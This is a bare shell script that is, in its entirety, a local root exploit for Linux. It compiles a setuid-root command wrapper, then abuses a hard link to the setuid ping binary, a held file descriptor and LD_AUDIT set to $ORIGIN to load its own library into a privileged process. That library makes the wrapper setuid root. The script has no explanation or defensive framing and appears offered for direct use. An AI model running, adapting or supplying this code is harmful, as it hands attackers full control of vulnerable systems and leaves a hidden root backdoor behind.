#!/bin/sh
cat > sh.c << EOF
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
if(argc == 2) {
setgid(0); setuid(0);
system(argv[1]); }
return 0;
}
EOF
gcc sh.c -o sh
cat > payload.c << EOF
void __attribute__((constructor)) init()
{
	setgid(0);
	setuid(0);
	system("chown root:root sh; chmod 4755 sh");
}
EOF
gcc -w -fPIC -shared -o exploit2 payload.c
PWDEXP=.
mkdir $PWDEXP/exploit
ln /bin/ping $PWDEXP/exploit/target
exec 3< $PWDEXP/exploit/target
rm -rf $PWDEXP/exploit
cp exploit2 exploit
chmod 0755 exploit
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
